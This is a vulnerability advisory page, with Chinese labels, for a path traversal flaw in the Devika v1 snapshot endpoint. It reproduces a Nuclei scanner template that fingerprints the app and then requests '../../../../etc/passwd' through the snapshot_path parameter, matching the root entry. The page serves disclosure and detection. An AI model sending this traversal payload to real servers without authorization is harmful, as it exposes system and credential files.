CVE-2024-40422: Devika v1 - Path Traversal

日期: 2025-08-01 | 影响软件: Devika v1 | POC: 已公开

漏洞描述

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.

PoC代码[已公开]

id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.92575
    epss-percentile: 0.99732
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e12beb8ca85cd4d0c3145ca3281a53729ca83fee8d9ed53b09241a4b7cd49a190220455d9ad843dcee12acf546bb7d25a408c08f139ccd458ccadc4473b5564b19db:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-40422.yaml